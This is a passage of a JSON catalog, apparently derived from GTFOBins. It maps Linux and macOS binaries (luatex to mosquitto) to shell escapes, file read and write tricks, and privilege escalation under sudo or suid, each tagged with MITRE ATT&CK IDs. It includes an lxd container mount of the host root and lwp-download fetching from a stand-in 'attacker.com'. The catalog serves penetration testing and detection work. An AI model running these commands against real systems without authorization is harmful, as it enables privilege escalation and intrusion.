Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/luatex/"]},{"id":"gtfo:lwp-download:download:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:download:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-read:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-read:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:1:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:1:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-request:file-read:0:sudo","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-request/"]},{"id":"gtfo:lwp-request:file-read:0:unprivileged","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-request/"]},{"id":"gtfo:lxd:shell:0:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:lxd:shell:0:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:lxd:shell:1:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:lxd:shell:1:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:m4:command:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:command:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:command:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:file-read:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:file-read:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:file-read:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:shell:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:shell:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:shell:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:mail:shell:0:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:0:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:0:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:1:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:1:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:1:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:make:file-read:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-read:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-read:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-write:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-write:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-write:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:shell:0:sudo","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:shell:0:suid","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:shell:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:man:file-read:0:sudo","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:file-read:0:suid","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:file-read:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:inherit:0:sudo","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:inherit:0:suid","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:inherit:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:shell:0:sudo","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:shell:0:suid","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:shell:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:mawk:file-read:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-read:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-read:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-write:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-write:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-write:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:shell:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:shell:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:shell:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:minicom:shell:0:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:0:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh -p`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:0:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:1:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:1:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:1:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:more:file-read:0:sudo","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:file-read:0:suid","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:file-read:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:shell:0:sudo","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:shell:0:suid","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:shell:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:mosh-server:shell:0:sudo","toolId":"gtfo:mosh-server","toolName":"mosh-server","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mosh --server=mosh-server localhost /bin/sh","description":"The `mosh-server` has to be executed via `sudo`, e.g., `'--server=sudo mosh-server'`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosh-server/"]},{"id":"gtfo:mosquitto:file-read:0:sudo","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosquitto/"]},{"id":"gtfo:mosquitto:file-read:0:suid","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mosquitto/"]},{"id":"gtfo:mosquitto:file-read:0:unprivileged","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error 